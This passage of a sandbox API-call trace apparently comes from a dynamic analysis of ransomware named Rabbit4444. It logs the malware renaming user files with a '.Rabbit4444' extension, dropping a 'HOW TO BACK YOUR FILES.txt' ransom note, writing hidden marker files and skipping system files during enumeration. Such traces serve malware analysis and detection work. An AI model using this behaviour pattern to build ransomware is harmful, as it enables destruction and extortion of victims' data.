dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x53c00) returned 0x2b0000 [0067.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.209] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15852003272) returned 1 [0067.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0067.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0067.209] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0067.212] CloseHandle (hObject=0x260) returned 1 [0067.213] CloseHandle (hObject=0x27c) returned 1 [0067.213] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt.Rabbit4444") returned 136 [0067.213] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\settingscache.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\SettingsCache.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\settingscache.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.214] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58188604, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x771b8f20, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x771b8f20, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x538f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SettingsCache.txt", cAlternateFileName="SETTIN~1.TXT")) returned 0 [0067.214] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0067.214] lstrcpyW (in: lpString1=0x130ec10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.214] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.215] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0067.215] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.216] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.220] CloseHandle (hObject=0x27c) returned 1 [0067.220] CloseHandle (hObject=0x228) returned 1 [0067.220] GetCurrentThreadId () returned 0xd98 [0067.220] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0067.220] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex" [0067.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b508 | out: hHeap=0xe0000) returned 1 [0067.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0067.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex" [0067.220] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\" [0067.220] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\.BFC0E91B00AE8A0620D3" [0067.220] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.224] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.226] FlushFileBuffers (hFile=0x228) returned 1 [0067.227] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.227] CloseHandle (hObject=0x228) returned 1 [0067.228] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex") returned 105 [0067.228] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.228] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2412562, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3bf615b5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf163d2e6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0067.228] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.228] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.228] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.228] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.228] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2412562, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3bf615b5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf163d2e6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.228] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.228] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.228] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.228] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.229] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.229] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf163d2e6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf163d2e6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf163d2e6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.229] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.229] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.229] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aefe5fb, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x439aeafc, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x439aeafc, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", cAlternateFileName="APPS_{~1")) returned 1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="Rabbit4444.exe") returned -1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2=".") returned 1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="..") returned 1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="windows") returned -1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="bootmgr") returned -1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="pagefile.sys") returned -1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="boot") returned -1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="ids.txt") returned -1 [0067.229] lstrcmpiW (lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="NTUSER.DAT") returned -1 [0067.229] lstrcpyW (in: lpString1=0x130ec0c, lpString2="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}" | out: lpString1="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}") returned="Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}" [0067.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0067.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x12c) returned 0x105020 [0067.230] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122288 [0067.230] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x249cf976, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24d16d3f, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x24d16d3f, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", cAlternateFileName="APPS_{~2")) returned 1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="Rabbit4444.exe") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2=".") returned 1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="..") returned 1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="windows") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="bootmgr") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="pagefile.sys") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="boot") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="ids.txt") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="NTUSER.DAT") returned -1 [0067.230] lstrcpyW (in: lpString1=0x130ec0c, lpString2="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}" | out: lpString1="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}") returned="Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}" [0067.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0067.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x12c) returned 0x11e1e8 [0067.230] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x121fe8 [0067.230] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aefe5fb, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x31247c5d, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x31247c5d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", cAlternateFileName="APPS_{~4")) returned 1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="Rabbit4444.exe") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2=".") returned 1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="..") returned 1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="windows") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="bootmgr") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="pagefile.sys") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="boot") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="ids.txt") returned -1 [0067.230] lstrcmpiW (lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="NTUSER.DAT") returned -1 [0067.230] lstrcpyW (in: lpString1=0x130ec0c, lpString2="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}" | out: lpString1="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}") returned="Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}" [0067.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0067.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x12c) returned 0x11da10 [0067.230] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122208 [0067.230] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24d1109, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x24f7384, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", cAlternateFileName="INPUT_~1")) returned 1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="Rabbit4444.exe") returned -1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2=".") returned 1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="..") returned 1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="windows") returned -1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="bootmgr") returned 1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="pagefile.sys") returned -1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="boot") returned 1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="ids.txt") returned 1 [0067.231] lstrcmpiW (lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="NTUSER.DAT") returned -1 [0067.231] lstrcpyW (in: lpString1=0x130ec0c, lpString2="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}" | out: lpString1="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}") returned="Input_{ecd52277-de32-43d5-8c62-58de1116f72e}" [0067.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0067.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x12e) returned 0x11db48 [0067.231] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x122248 [0067.231] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x525872ee, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x53362df6, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x53362df6, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", cAlternateFileName="SETTIN~1")) returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="Rabbit4444.exe") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2=".") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="..") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="windows") returned -1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="bootmgr") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="pagefile.sys") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="boot") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="ids.txt") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="NTUSER.DAT") returned 1 [0067.231] lstrcpyW (in: lpString1=0x130ec0c, lpString2="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}" | out: lpString1="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}") returned="Settings_{26159dcd-00b6-4881-a91c-092cd378d482}" [0067.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0067.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x134) returned 0x11dc80 [0067.231] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x121fa8 [0067.231] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78d8f9a0, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x799c29bd, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x799c29bd, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", cAlternateFileName="SETTIN~2")) returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="Rabbit4444.exe") returned 1 [0067.231] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2=".") returned 1 [0067.232] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="..") returned 1 [0067.232] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="windows") returned -1 [0067.232] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="bootmgr") returned 1 [0067.232] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="pagefile.sys") returned 1 [0067.232] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="boot") returned 1 [0067.232] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="ids.txt") returned 1 [0067.232] lstrcmpiW (lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}", lpString2="NTUSER.DAT") returned 1 [0067.232] lstrcpyW (in: lpString1=0x130ec0c, lpString2="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}" | out: lpString1="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}") returned="Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}" [0067.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0067.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x134) returned 0x115180 [0067.232] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x1222a8 [0067.232] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78d8f9a0, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x799c29bd, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x799c29bd, 